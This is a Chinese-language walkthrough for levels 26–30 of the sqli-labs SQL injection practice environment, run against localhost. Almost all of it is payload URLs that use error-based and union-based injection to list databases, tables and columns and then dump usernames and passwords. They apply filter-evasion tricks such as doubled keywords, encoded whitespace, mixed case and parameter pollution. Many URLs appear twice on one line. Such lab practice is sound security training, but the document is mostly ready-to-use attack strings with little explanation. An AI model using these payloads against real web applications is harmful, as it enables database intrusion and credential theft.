第26关
一.查询数据库
http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27
二.查表
http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27
http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27
三.查列
http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27
四.查user表里信息
http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27
第27关
一.查询数据库
http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27
二.查表
http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27
三.查列
http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27
四.查user表里信息
http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27
第28关
一.查询数据库
http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271
二.查表
http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271
三.查列
http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271
四.查询user表中信息
http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271
第29关
一.查询数据库
http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+
二.查表
http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+
三.查列
http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+
四.查user表中信息
http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+
第30关
一.查询数据库
http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+
二.查表
http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+
三.查列
http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+
四.查user表中信息
http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+
